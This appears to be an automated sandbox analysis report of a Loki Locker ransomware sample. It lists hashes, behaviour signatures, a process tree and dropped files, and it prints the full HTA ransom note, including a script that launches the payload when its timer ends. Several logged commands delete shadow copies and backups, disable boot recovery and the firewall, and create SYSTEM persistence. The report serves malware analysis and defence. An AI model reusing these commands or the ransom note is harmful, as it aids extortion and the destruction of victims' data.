Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-10-2024 02:56

General

  • Target

    e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe

  • Size

    499KB

  • MD5

    d7d28006e0679b1f2ea0a87ba94f4af0

  • SHA1

    675f7b9185ccc3241650ff2fd96f5e1a0bbf63ee

  • SHA256

    e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3

  • SHA512

    b3f9257825850e4f2920d05f45eece26323d81d06a761fa2e5b2d154535d45f996a316e238f2d29fb82081a133dfd5ad304835317e65fa72f9fc2e1acbfce03a

  • SSDEEP

    12288:dSGy1fPQ+biwPPMgasqdprlTT6zncVUJ7vn:kGy1fP9PPIrTT6DN

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\info.hta

Ransom Note
<html> <head> <title>Loki locker</title> <HTA:APPLICATION ICON='msiexec.exe' WINDOWSTATE="maximize" SINGLEINSTANCE='yes' SysMenu="no" contextmenu="no" scroll="yes"/> <meta http-equiv="x-ua-compatible" content="IE=9"/> </head> <style type="text/css"> body{background-color: #000000; font-family: Arial, Helvetica, sans-serif;}#t{text-align: center; color: #FF0000; font-weight: bold; font-size: 1.51vw; margin-bottom: 0;}p{text-align: center; font-size: 1vw; color: white; margin-bottom: 0;}.t{text-align: left; margin-left: 2px;}.pt{color: white; font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; font-size: 1.1vw;}.b{padding: 2px; outline: none;}ul{font-size: 1vw;}.m{background: rgb(189, 54, 54); padding: 1px 5px; font-weight: bold;}#tm{color: red; text-align: center; border-bottom: 0; font-size: 2vw;}</style> <script>var countDownDate = new Date(2024,9,25,2,57,30).getTime(); var x = setInterval(function () { var now = new Date().getTime(); var distance = countDownDate - now; var days = Math.floor(distance / (1000 * 60 * 60 * 24)); var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); var seconds = Math.floor((distance % (1000 * 60)) / 1000); document.getElementById("tm").innerHTML = days + "d," + hours + ":" + minutes + ":" + seconds + " LEFT TO LOSE ALL OF YOUR FILES"; if (distance < 0) { clearInterval(x); document.getElementById("tm").innerHTML = "TIMER IS UP.SAY BYE TO YOUR FILES :)"; WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("C:\\ProgramData\\winlogon.exe", 1, false);}}, 1000); </script> <body > <h1 id="t">All your files have been encrypted by Loki locker!</h1> <h2 id="tm"></h2> <p>All your files have been encrypted due to a security problem with your PC. <br>If you want to restore them, please send an email <span class="m">[email protected]</span> </p><br><p class="t"> You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. <br>After payment we will send you the decryption tool. <br>You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay <b>Double</b>. <br>In case of no answer in 24 hours (1 Day) write to this email <span class="m">[email protected]</span> <br>Your unique ID is : <span class="m">58344A94</span> </p><br><div class="b" style="background-color: #FF0000;"> <div class="pt">You only have LIMITED time to get back your files!</div><ul style="color: white; margin-top: 0;"> <li>If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED.</li><li>You will lose some of your data on day 2 in the timer.</li><li>You can buy more time for pay. Just email us.</li><li>THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) </li></ul> </div><br><div class="b" style="background-color: rgb(78, 78, 78);"> <div class="pt">What is our decryption guarantee?</div><ul style="color: white; margin-top: 0;"> <li>Before paying you can send us up to <u>3 test files</u> for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)</li></div><br><div class="b" style="background-color: #FF0000;"> <div class="pt">Attention!</div><ul style="color: white; margin-top: 0;"> <li><u><b>DO NOT</b> pay any money before decrypting the test files.</u></li><li><u><b>DO NOT</b> trust any intermediary.</u> they wont help you and you may be victim of scam. just email us , we help you in any steps.</li><li><u><b>DO NOT</b> reply to other emails.</u> ONLY this two emails can help you.</li><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li><li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li></ul> </div></body> </html>
Emails

class="m">[email protected]</span>

class="m">[email protected]</span>

URLs

http-equiv="x-ua-compatible"

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 28 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Control Panel 2 IoCs
  • Modifies registry class 8 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe
    "C:\Users\Admin\AppData\Local\Temp\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2128
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5476
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:376
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y2ckrffq\y2ckrffq.cmdline"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5032
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES319A.tmp" "c:\ProgramData\CSC3EFA743BADC04205A98E14F5CAC9A499.TMP"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5648
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
      2⤵
      • System Location Discovery: System Language Discovery
      PID:6016
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
      2⤵
      • System Location Discovery: System Language Discovery
      PID:6008
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:6076
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:5696
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
      2⤵
      • System Location Discovery: System Language Discovery
      PID:6120
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • System Location Discovery: System Language Discovery
      PID:6124
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4936
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5828
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:4472
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5824
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode mode=disable
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:5340
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:5452
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 1428
        3⤵
        • Program crash
        PID:5456
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4784
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1744
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 1436
        3⤵
        • Program crash
        PID:2260
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:116
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 116 -s 1336
        3⤵
        • Program crash
        PID:6124
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3396
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3396 -s 1368
        3⤵
        • Program crash
        PID:5368
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2336
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3396 -ip 3396
    1⤵
      PID:6128
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4784 -ip 4784
      1⤵
        PID:5400
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 116 -ip 116
        1⤵
          PID:6120
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1744 -ip 1744
          1⤵
            PID:5772
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5452 -ip 5452
            1⤵
              PID:3624

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\5ha2hibk.exe

              Filesize

              32KB

              MD5

              134f012757195ef52eb253201be7ff38

              SHA1

              12fb8b3f0cd1638f9f06e67fcc062e76fd4286d9

              SHA256

              570e693a8625978a46c7970009f328b395782089c0401f49e1482da07303f76b

              SHA512

              edb002183f061cf4ddb5d4a696b74908fa66b7e56233901d1a1d10f57f427044f3e84a5950ee2dc0f16f4ce6fbc33720d55484df5e47a52ba88f280fc5db3257

            • C:\ProgramData\winlogon.exe

              Filesize

              499KB

              MD5

              d7d28006e0679b1f2ea0a87ba94f4af0

              SHA1

              675f7b9185ccc3241650ff2fd96f5e1a0bbf63ee

              SHA256

              e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3

              SHA512

              b3f9257825850e4f2920d05f45eece26323d81d06a761fa2e5b2d154535d45f996a316e238f2d29fb82081a133dfd5ad304835317e65fa72f9fc2e1acbfce03a

            • C:\Users\Admin\AppData\Local\Temp\RES319A.tmp

              Filesize

              29KB

              MD5

              52e12418bf2ae2d7d69d77c5953b9e78

              SHA1

              2b344064a73780c794f950e2bec48ad315edf896

              SHA256

              302d108b502dd6255061c0822bae01eb230f52c8274c30a8f71d033333525112

              SHA512

              6adb8ff2f81f25ccc12ce6c68310f4c66f26cdd3a729239448d353ded7a455561bec28e625f6d47006df5aaf9301f7179175b1561d8bbfc42a402488536de9a7

            • C:\Users\Admin\AppData\Local\Temp\info.hta

              Filesize

              3KB

              MD5

              80bb4c4a3a988d7eab8240e85e07401f

              SHA1

              9424a3587e8b77866fd5dc598715a8569a0aedac

              SHA256

              f0922c59720b8590b821573435e08523734c3c17258adc280ed7b33bbcb75c7b

              SHA512

              6aab15dc2f69cefb6c23b6e123cce02cb22ccac79e94729f2c828a4ace56cf9c94878869c95ad6ab80cf3dd31f834c53f2230118a27ab035ab917c832e655f71

            • C:\Users\Admin\Desktop\Cpriv.Loki

              Filesize

              2KB

              MD5

              d4091fcabf754815f654ea52de30231b

              SHA1

              0e844be856f3a6b82dbe7e05d4c2dfb340631c4b

              SHA256

              cc14b935ce8724fe2f01933e8727e813bd54cf70f1f0c845b9ec413901c91dd9

              SHA512

              cd4f4983161818b6cfd30e5ce488bfdf86f6c411698c93bae35623362093767eca96b432a16fe2ad100978ee6bc86c6a564e8cbd3d331a5e425622ba4398ba04

            • C:\Users\Admin\Documents\Restore-My-Files.txt

              Filesize

              344B

              MD5

              4619f9eed707de724ceb97b506d7b6fe

              SHA1

              6868619ecca7303fcbc9a3d440dddb7f50775e0a

              SHA256

              00e261865614395f37891df8baaf63c09bf2c67b99bbb7951f633824c95b0e52

              SHA512

              5a63a7e0393127414806a83a695e1d63bf97c376e2c43e410b46e4acca5ee1ea0bbcd30ac45e2f517550c9c20ed43d11960b41beae90bb4b3665548af6728b50

            • \??\c:\ProgramData\CSC3EFA743BADC04205A98E14F5CAC9A499.TMP

              Filesize

              28KB

              MD5

              ef314b2832f08be28a768647b672f4ff

              SHA1

              a43b602f1453f25da6c5267e2becd098836a48ad

              SHA256

              a4803bed4ac93466c2f3fa08cd166869da1d2585bb3a927f2c7a43ac94675cae

              SHA512

              4781ab5643834af818785950ff876d44f3be03d08312a2792fdb939257c341925a7ce2024a45eb374b41798cd1fea318f93a6105f1672fcb9778163c221a6c75

            • \??\c:\Users\Admin\AppData\Local\Temp\rv3yc3xz.ico

              Filesize

              27KB

              MD5

              dbc49b5f7714255217080c2e81f05a99

              SHA1

              4de2ef415d66d2bb8b389ba140a468b125388e19

              SHA256

              6d2f1f6164cbd331b9dc43b37948372e21b2ee45407aa99e199693835cded09c

              SHA512

              29a65eb7403bfc220fd057c2e6ea11b29bff545dfce2d3370ad462c66b03ae7f648efd480305423a49440de199a2a94c41214877b226a42dc2d1650683d149bb

            • \??\c:\Users\Admin\AppData\Local\Temp\y2ckrffq\y2ckrffq.0.cs

              Filesize

              1KB

              MD5

              c613631bdd33f586082cd9fa5c31a399

              SHA1

              f629d338ddcb32039b87831e640f07ca443a2d31

              SHA256

              8e19800612f096b7f53f5aa023babe7aeee3a8aaf6f7421063ed245ebea1a70a

              SHA512

              1ac9a6b54fe6360cab5514ea5f9084c78cf0235a31f26705e3829b95554651c2718ea2eaeacbc2f5a77671fa587955cb1ec6d4c5016096c1a72be29bacc13de8

            • \??\c:\Users\Admin\AppData\Local\Temp\y2ckrffq\y2ckrffq.cmdline

              Filesize

              236B

              MD5

              84e055377be82abb58026b55e1f4bfb7

              SHA1

              bf54ea5e74d23763c019f956f4246768c5ca0184

              SHA256

              685e6f3f8d58bf68824739dedd8bc000688c25b6a96e9019be72f5867550e7b3

              SHA512

              0f557598ce20bd5982ba2ce3e366c992651a6bcc2da99dd84d49b293df1a9bbf273cd0e5fcf19868abe7c5166b237e29113a1ea27cb51c556a68b4ed5a202e97

            • memory/2128-4-0x0000000005770000-0x00000000057E6000-memory.dmp

              Filesize

              472KB

            • memory/2128-8-0x0000000074A00000-0x00000000751B0000-memory.dmp

              Filesize

              7.7MB

            • memory/2128-7-0x0000000074A0E000-0x0000000074A0F000-memory.dmp

              Filesize

              4KB

            • memory/2128-6-0x0000000074A00000-0x00000000751B0000-memory.dmp

              Filesize

              7.7MB

            • memory/2128-5-0x0000000005500000-0x0000000005522000-memory.dmp

              Filesize

              136KB

            • memory/2128-0-0x0000000074A0E000-0x0000000074A0F000-memory.dmp

              Filesize

              4KB

            • memory/2128-3-0x00000000055F0000-0x0000000005656000-memory.dmp

              Filesize

              408KB

            • memory/2128-2-0x0000000005550000-0x00000000055E2000-memory.dmp

              Filesize

              584KB

            • memory/2128-1-0x0000000000B30000-0x0000000000BB8000-memory.dmp

              Filesize

              544KB